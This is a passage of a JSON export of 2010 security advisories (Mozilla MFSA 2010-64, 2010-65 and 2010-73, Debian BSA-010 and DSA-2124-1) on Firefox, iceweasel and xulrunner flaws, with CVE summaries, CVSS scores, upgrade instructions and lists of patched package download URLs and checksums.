Igor Bukanov and Josh Soref reported memory safety problems that affected Firefox 3.6 and Firefox 3.5.\r\n\r\n * Memory safety bugs - Firefox 3.6, Firefox 3.5\r\n * CVE-2010-3176\r\n\r\nGary Kwong, Martijn Wargers, Siddharth Agarwal and Michal Zalewski reported memory safety problems that affected Firefox 3.6 only.\r\n\r\n * Memory safety bugs - Firefox 3.6\r\n * CVE-2010-3175\r\n\r\nJesse Ruderman reported a crash which affected Firefox 3.5 only.\r\n\r\n * https://bugzilla.mozilla.org/show_bug.cgi?id=476547\r\n * CVE-2010-3174\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2010-10-23T00:00:00", "title": "Mozilla Foundation Security Advisory 2010-64", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:37", "vector": "NONE", "value": 10.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2010-3176", "CVE-2010-3174", "CVE-2010-3175"], "modified": "2010-10-23T00:00:00", "id": "SECURITYVULNS:DOC:24955", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24955", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:37", "references": [], "description": "Mozilla Foundation Security Advisory 2010-73\r\n\r\nTitle: Heap buffer overflow mixing document.write and DOM insertion\r\nImpact: Critical\r\nAnnounced: October 27, 2010\r\nReporter: Morten Kråkvik\r\nProducts: Firefox, Thunderbird, SeaMonkey\r\n\r\nFixed in: Firefox 3.6.12\r\n Firefox 3.5.15\r\n Thunderbird 3.1.6\r\n Thunderbird 3.0.10\r\n SeaMonkey 2.0.10\r\nDescription\r\n\r\nMorten Kråkvik of Telenor SOC reported an exploit targeting particular versions of Firefox 3.6 on Windows XP that Telenor found while investigating an intrusion attempt on a customer network. The underlying vulnerability, however, was present on both the Firefox 3.5 and Firefox 3.6 development branches and affected all supported platforms.\r\n\r\nReading mail in Thunderbird does not pose a risk to users, however the vulnerability is present and could be triggered in RSS feeds if JavaScript is enabled or by an add-on that enables browser-like functionality.\r\nReferences\r\n\r\n * https://bugzilla.mozilla.org/show_bug.cgi?id=607222\r\n * CVE-2010-3765\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2010-11-01T00:00:00", "title": "Mozilla Foundation Security Advisory 2010-73", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:37", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2010-3765"], "modified": "2010-11-01T00:00:00", "id": "SECURITYVULNS:DOC:25019", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25019", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:37", "references": [], "description": "Mozilla Foundation Security Advisory 2010-65\r\n\r\nTitle: Buffer overflow and memory corruption using document.write\r\nImpact: Critical\r\nAnnounced: October 19, 2010\r\nReporter: Alexander Miller\r\nProducts: Firefox, Thunderbird, SeaMonkey\r\n\r\nFixed in: Firefox 3.6.11\r\n Firefox 3.5.14\r\n Thunderbird 3.1.5\r\n Thunderbird 3.0.9\r\n SeaMonkey 2.0.9\r\nDescription\r\n\r\nSecurity researcher Alexander Miller reported that passing an excessively long string to document.write could cause text rendering routines to end up in an inconsistent state with sections of stack memory being overwritten with the string data. An attacker could use this flaw to crash a victim's browser and potentially run arbitrary code on their computer.\r\nReferences\r\n\r\n * https://bugzilla.mozilla.org/show_bug.cgi?id=583077\r\n * CVE-2010-3179\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2010-10-23T00:00:00", "title": "Mozilla Foundation Security Advisory 2010-65", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:37", "vector": "NONE", "value": 10.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2010-3179"], "modified": "2010-10-23T00:00:00", "id": "SECURITYVULNS:DOC:24956", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24956", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2018-10-16T22:13:00", "references": [], "affectedPackage": [], "description": "Alexander Reichle-Schmehl uploaded new packages for iceweasel which fixed the\nfollowing security problems:\n\nCVE-2010-3174\nCVE-2010-3176\n\tMultiple unspecified vulnerabilities in the browser engine in\n\tIceweasel allow remote attackers to cause a denial of service\n\t(memory corruption and application crash) or possibly execute\n\tarbitrary code via unknown vectors.\n\nCVE-2010-3177\n\tMultiple cross-site scripting (XSS) vulnerabilities in the\n\tGopher parser in Iceweasel allow remote attackers to inject\n\tarbitrary web script or HTML via a crafted name of a (1) file\n\tor (2) directory on a Gopher server.\n\nCVE-2010-3178\n\tIceweasel does not properly handle certain modal calls made by\n\tjavascript: URLs in circumstances related to opening a new\n\twindow and performing cross-domain navigation, which allows\n\tremote attackers to bypass the Same Origin Policy via a\n\tcrafted HTML document.\n\nCVE-2010-3179\n\tStack-based buffer overflow in the text-rendering\n\tfunctionality in Iceweasel allows remote attackers to execute\n\tarbitrary code or cause a denial of service (memory corruption\n\tand application crash) via a long argument to the\n\tdocument.write method.\n\nCVE-2010-3180\n\tUse-after-free vulnerability in the nsBarProp function in\n\tIceweasel allows remote attackers to execute arbitrary code by\n\taccessing the locationbar property of a closed window.\n\nCVE-2010-3183\n\tThe LookupGetterOrSetter function in Iceweasel does not\n\tproperly support window.__lookupGetter__ function calls that\n\tlack arguments, which allows remote attackers to execute\n\tarbitrary code or cause a denial of service (incorrect pointer\n\tdereference and application crash) via a crafted HTML\n\tdocument.\n\nFor the lenny-backports distribution the problems have been fixed in\nversion 3.5.15-1~bpo50+1.\n\nUpgrade instructions\n- --------------------\n\nIf you don't use pinning (see [1]) you have to update the package\nmanually via "apt-get -t lenny-backports install <packagelist>" with\nthe packagelist of your installed packages affected by this update.\n[1] <http://backports.debian.org/Instructions>\n\nWe recommend to pin (in /etc/apt/preferences) the backports repository to\n200 so that new versions of installed backports will be installed\nautomatically. \n\n Package: *\n Pin: release a=lenny-backports\n Pin-Priority: 200\n\n", "edition": 1, "reporter": "Debian", "published": "2010-11-02T19:04:50", "title": "BSA-010 Security Update for iceweasel", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:13:00", "vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3177", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3174", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3183"], "modified": "2010-11-02T19:04:50", "id": "DEBIAN:BSA-010-:53435", "href": "https://lists.debian.org/debian-backports-announce/2010/debian-backports-announce-201011/msg00002.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-16T22:13:17", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "all", "packageFilename": "libmozillainterfaces-java_1.9.0.19-6_all.deb", "packageName": "libmozillainterfaces-java", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "all", "packageFilename": "python-xpcom_1.9.0.19-6_all.deb", "packageName": "python-xpcom", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "all", "packageFilename": "xulrunner-1.9-dbg_1.9.0.19-6_all.deb", "packageName": "xulrunner-1.9-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "all", "packageFilename": "spidermonkey-bin_1.9.0.19-6_all.deb", "packageName": "spidermonkey-bin", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "all", "packageFilename": "libmozjs-dev_1.9.0.19-6_all.deb", "packageName": "libmozjs-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "all", "packageFilename": "xulrunner-1.9_1.9.0.19-6_all.deb", "packageName": "xulrunner-1.9", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "all", "packageFilename": "libmozjs1d_1.9.0.19-6_all.deb", "packageName": "libmozjs1d", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "all", "packageFilename": "xulrunner-dev_1.9.0.19-6_all.deb", "packageName": "xulrunner-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "all", "packageFilename": "xulrunner-1.9-gnome-support_1.9.0.19-6_all.deb", "packageName": "xulrunner-1.9-gnome-support", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "all", "packageFilename": "libmozjs1d-dbg_1.9.0.19-6_all.deb", "packageName": "libmozjs1d-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "all", "packageFilename": "xulrunner_1.9.0.19-6_all.deb", "packageName": "xulrunner", "operator": "lt"}], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-2124-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nNovember 01, 2010 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : xulrunner\nVulnerability : several\nProblem type : local (remote)\nDebian-specific: no\nCVE Id(s) : CVE-2010-3765 CVE-2010-3174 CVE-2010-3176 CVE-2010-3177 CVE-2010-3178 CVE-2010-3179 CVE-2010-3180 CVE-2010-3183\n\nSeveral vulnerabilities have been discovered in Xulrunner, the\ncomponent that provides the core functionality of Iceweasel, Debian's\nvariant of Mozilla's browser technology.\n\nThe Common Vulnerabilities and Exposures project identifies the\nfollowing problems:\n\nCVE-2010-3765\n\tXulrunner allows remote attackers to execute arbitrary code\n\tvia vectors related to nsCSSFrameConstructor::ContentAppended,\n\tthe appendChild method, incorrect index tracking, and the\n\tcreation of multiple frames, which triggers memory corruption.\n\nCVE-2010-3174\nCVE-2010-3176\n\tMultiple unspecified vulnerabilities in the browser engine in\n\tXulrunner allow remote attackers to cause a denial of service\n\t(memory corruption and application crash) or possibly execute\n\tarbitrary code via unknown vectors.\n\nCVE-2010-3177\n\tMultiple cross-site scripting (XSS) vulnerabilities in the\n\tGopher parser in Xulrunner allow remote attackers to inject\n\tarbitrary web script or HTML via a crafted name of a (1) file\n\tor (2) directory on a Gopher server.\n\nCVE-2010-3178\n\tXulrunner does not properly handle certain modal calls made by\n\tjavascript: URLs in circumstances related to opening a new\n\twindow and performing cross-domain navigation, which allows\n\tremote attackers to bypass the Same Origin Policy via a\n\tcrafted HTML document.\n\nCVE-2010-3179\n\tStack-based buffer overflow in the text-rendering\n\tfunctionality in Xulrunner allows remote attackers to execute\n\tarbitrary code or cause a denial of service (memory corruption\n\tand application crash) via a long argument to the\n\tdocument.write method.\n\nCVE-2010-3180\n\tUse-after-free vulnerability in the nsBarProp function in\n\tXulrunner allows remote attackers to execute arbitrary code by\n\taccessing the locationbar property of a closed window.\n\nCVE-2010-3183\n\tThe LookupGetterOrSetter function in Xulrunner does not\n\tproperly support window.__lookupGetter__ function calls that\n\tlack arguments, which allows remote attackers to execute\n\tarbitrary code or cause a denial of service (incorrect pointer\n\tdereference and application crash) via a crafted HTML\n\tdocument.\n\nIn addition, this security update includes corrections for regressions\ncaused by the fixes for CVE-2010-0654 and CVE-2010-2769 in DSA-2075-1\nand DSA-2106-1.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 1.9.0.19-6.\n\nFor the unstable distribution (sid) and the upcoming stable\ndistribution (squeeze), these problems have been fixed in version\n3.5.15-1 of the iceweasel package.\n\nWe recommend that you upgrade your Xulrunner packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.19-6.dsc\n Size/MD5 checksum: 1755 e07e9c6f05d92caf3c5a068b8cf249e1\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.19.orig.tar.gz\n Size/MD5 checksum: 44174623 83667df1e46399960593fdd8832e958e\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.19-6.diff.gz\n Size/MD5 checksum: 176924 9ac56cbdededbd37f30b2fbf85724ba1\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozillainterfaces-java_1.9.0.19-6_all.deb\n Size/MD5 checksum: 1466740 4db5a3cb380642680fc8584bbd559c1c\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-6_alpha.deb\n Size/MD5 checksum: 223584 461a28c6405acd4f9bb0576e2982da4e\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-6_alpha.deb\n Size/MD5 checksum: 9491974 d636e29b64c83a2a43d7cf50231ef343\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-6_alpha.deb\n Size/MD5 checksum: 3358362 08e9f79784ad3ba52a30aa1e71553d95\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-6_alpha.deb\n Size/MD5 checksum: 113684 95e4be0c1b10b218859e810ded67ce0d\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-6_alpha.deb\n Size/MD5 checksum: 51201246 ad06f952e5d32680b1739970c0af38d3\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-6_alpha.deb\n Size/MD5 checksum: 165678 3336d43295e15ec246acb9d65aa1684b\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-6_alpha.deb\n Size/MD5 checksum: 940892 45e2a60037bb7bff9c73c882d87d7dbc\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-6_alpha.deb\n Size/MD5 checksum: 72724 742cc5e1c363163a192c6cb6fdb5205a\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-6_alpha.deb\n Size/MD5 checksum: 433560 ea475e8ea28eef6f33881499cfe4179a\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-6_amd64.deb\n Size/MD5 checksum: 70560 9b6ee7fb354dae5d78b03911ee5de94c\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-6_amd64.deb\n Size/MD5 checksum: 102210 3ec67b7e662e5a28228422676408138a\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-6_amd64.deb\n Size/MD5 checksum: 891472 54b7b88accdfc1afe4f3e35669323c26\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-6_amd64.deb\n Size/MD5 checksum: 375598 8c057b0858c9518ec39c64a9e378998c\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-6_amd64.deb\n Size/MD5 checksum: 153740 d3803bab845ace63025958f0035cee51\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-6_amd64.deb\n Size/MD5 checksum: 3298226 4832e7665e19a3301587f45657613c8a\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-6_amd64.deb\n Size/MD5 checksum: 223568 f464b4aa584a79a5639d3c7361df8437\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-6_amd64.deb\n Size/MD5 checksum: 50454656 0743e8ba1643eef745c87c59cc17c554\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-6_amd64.deb\n Size/MD5 checksum: 7734448 c872c7bf80990a6d80e79d1147cf4701\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-6_arm.deb\n Size/MD5 checksum: 351476 6b3d9c8fe879e8963523443c4c9a0741\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-6_arm.deb\n Size/MD5 checksum: 68742 41a546be60e4d7c1c5d03e9e994b89f9\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-6_arm.deb\n Size/MD5 checksum: 141078 99a1ca3e81b9b8d8769d044115f7e349\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-6_arm.deb\n Size/MD5 checksum: 3586576 9eccd861365ab77dc6ced37bf9430e58\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-6_arm.deb\n Size/MD5 checksum: 49403312 80ee2609ed8657844eb34d12096f17b0\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-6_arm.deb\n Size/MD5 checksum: 84422 242a44cfe822e79975f291553cf26d86\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-6_arm.deb\n Size/MD5 checksum: 815626 453e7cb1e3823a9196cf4a4338116834\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-6_arm.deb\n Size/MD5 checksum: 6807342 ff5e6f9aaeb25dff90ce89dd2cc60652\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-6_arm.deb\n Size/MD5 checksum: 222578 5bc459b6b8e2af17cac9b18dfc1b82e3\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-6_armel.deb\n Size/MD5 checksum: 71074 755a0a4267349287b1da5de5e9be0021\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-6_armel.deb\n Size/MD5 checksum: 50231752 b2bb2fbb6964339ea465f495a19dea81\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-6_armel.deb\n Size/MD5 checksum: 223724 ead62af874d36c771f1f25c146982d84\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-6_armel.deb\n Size/MD5 checksum: 353748 1606af72d97b8ca06792f90326f23b8d\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-6_armel.deb\n Size/MD5 checksum: 84326 9737260affb7e38ea553d72c07b4ecd2\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-6_armel.deb\n Size/MD5 checksum: 142212 973e6e0e3eba1bcb451fbf9519cb261b\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-6_armel.deb\n Size/MD5 checksum: 3583542 0c64d395a9b6d8295438e4163110bb58\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-6_armel.deb\n Size/MD5 checksum: 6967098 be90fb28695ebf960668af8787923749\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-6_armel.deb\n Size/MD5 checksum: 824452 b210f74f1d99e6c1d9adbfb5e55225cb\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-6_i386.deb\n Size/MD5 checksum: 6614408 93c72cde788476b48dacd580a8f0f0b8\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-6_i386.deb\n Size/MD5 checksum: 143160 b5e3590ebdbf7223c0bac024af05b5f2\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-6_i386.deb\n Size/MD5 checksum: 49607238 0f4cd75a85c5ae2e17e340c52481cb77\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-6_i386.deb\n Size/MD5 checksum: 852434 78449aa7888666a397684634e96070d5\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-6_i386.deb\n Size/MD5 checksum: 69152 9e8724cdf374b7b228f534f04a631f72\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-6_i386.deb\n Size/MD5 checksum: 79750 c3e7e841531ea35242fe2a2d511ef704\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-6_i386.deb\n Size/MD5 checksum: 224634 51de208fab610ca69ae485c5621aca72\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-6_i386.deb\n Size/MD5 checksum: 352144 5b52b17bfdf01bf8f30305e4ed7e48b1\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-6_i386.deb\n Size/MD5 checksum: 3574880 c443390f8b9ef56b5e0ce7b4edfc91e0\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-6_ia64.deb\n Size/MD5 checksum: 121966 55eb541ff1cce6c6f8edf6f8ed4d0ea2\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-6_ia64.deb\n Size/MD5 checksum: 223578 c2bd9d8d641d2e57a31621613fa19fa7\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-6_ia64.deb\n Size/MD5 checksum: 3401224 1f5b77b79cdd20fc741ed9fac2cffc87\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-6_ia64.deb\n Size/MD5 checksum: 49791322 7cfc30611f2acaa91cabee8f0a7c6259\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-6_ia64.deb\n Size/MD5 checksum: 76990 e59e3e9eadd95fb0a5cc6453bdaeff0b\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-6_ia64.deb\n Size/MD5 checksum: 542938 17a363bae7a8fbc5973ce38e2d99b8ee\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-6_ia64.deb\n Size/MD5 checksum: 180670 f1bfb87d0370d165254c7192d066764f\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-6_ia64.deb\n Size/MD5 checksum: 811756 046cde5fd861d4fdae89b079726ce972\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-6_ia64.deb\n Size/MD5 checksum: 11320366 9893c16ece56647f42702eb2e173e671\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-6_mips.deb\n Size/MD5 checksum: 96770 0fac3de71825c688751b5c40b95c8d98\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-6_mips.deb\n Size/MD5 checksum: 69814 8a8b34fedb2d35fcea5c281aa252c8ae\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-6_mips.deb\n Size/MD5 checksum: 222760 54aa507a287a89f2f395c46d10ced43b\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-6_mips.deb\n Size/MD5 checksum: 917958 27ac8e895138f658dd88fdadaef6d453\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-6_mips.deb\n Size/MD5 checksum: 7674738 68b41bbb0ade1076f3ff9d502e07e683\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-6_mips.deb\n Size/MD5 checksum: 3612480 bfe2fe243bc6a63445c8afed1d8f42f4\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-6_mips.deb\n Size/MD5 checksum: 51958928 caf4012f9054b5ddb9d1034d4f6a2310\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-6_mips.deb\n Size/MD5 checksum: 380340 607b465eab33052962ed2e2bf407b202\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-6_mips.deb\n Size/MD5 checksum: 144924 c668c26f27148096fdd00b4ccdf57603\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-6_mipsel.deb\n Size/MD5 checksum: 145522 d9ab5a31361170b1929e5e3fc8d3737f\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-6_mipsel.deb\n Size/MD5 checksum: 901150 93a76c67627dcede38ede95ef0dbab24\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-6_mipsel.deb\n Size/MD5 checksum: 379500 cdd76a729549920fa7c43ad34904876a\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-6_mipsel.deb\n Size/MD5 checksum: 3312100 42d95093bed6583e44f9ada333663b96\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-6_mipsel.deb\n Size/MD5 checksum: 97214 7ac3fe244d75bd86ed505057c88b38b5\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-6_mipsel.deb\n Size/MD5 checksum: 50087916 974829f5edf774ccad8a7960db5c504f\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-6_mipsel.deb\n Size/MD5 checksum: 70344 f53cab5743dd5d1909e5258715cd1086\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-6_mipsel.deb\n Size/MD5 checksum: 7389996 f1b3960ade2639292a0da9fcbd61f02c\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-6_mipsel.deb\n Size/MD5 checksum: 223582 edc6ad64cd525b4daae6fd999c8d19d7\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-6_powerpc.deb\n Size/MD5 checksum: 94838 a4e8fa67eeaff37d5a446e77267258c9\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-6_powerpc.deb\n Size/MD5 checksum: 363960 2d4c97ca00e68f6bd6e27afd48de5f1f\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-6_powerpc.deb\n Size/MD5 checksum: 7310408 1d29190b38183dc74fa0875ff711ffd3\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-6_powerpc.deb\n Size/MD5 checksum: 153028 670b97cca442bed3a3e4650e2627009f\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-6_powerpc.deb\n Size/MD5 checksum: 51515576 c4c9a54f4a99ba7091101e110e28f017\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-6_powerpc.deb\n Size/MD5 checksum: 73840 becb987c75679d68d168a0cc48c74808\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-6_powerpc.deb\n Size/MD5 checksum: 3594708 66e0554415ceeebf5d82dce11fbc7085\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-6_powerpc.deb\n Size/MD5 checksum: 223610 a449f47ed74e8b0b63bea10db09a426d\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-6_powerpc.deb\n Size/MD5 checksum: 889260 a38eca26e981a4a6f3b6d4ee66a5844b\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-6_s390.deb\n Size/MD5 checksum: 8428652 b9c392806759ca7581f0f145b99de35a\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-6_s390.deb\n Size/MD5 checksum: 223378 1be85952bf41e41bf5b54731b33a3ab6\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-6_s390.deb\n Size/MD5 checksum: 3609788 9487f101466ff241d70aae1fe3065833\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-6_s390.deb\n Size/MD5 checksum: 51305860 158c80447223be1274ba3989c40c9c66\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-6_s390.deb\n Size/MD5 checksum: 105898 710c5b7e247627f1b71d0f45fadc6f49\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-6_s390.deb\n Size/MD5 checksum: 909890 cc44415e624fb85ec0c15701ad9323f4\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-6_s390.deb\n Size/MD5 checksum: 155634 9bf9c3e1112b7e375c093344811ad80e\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-6_s390.deb\n 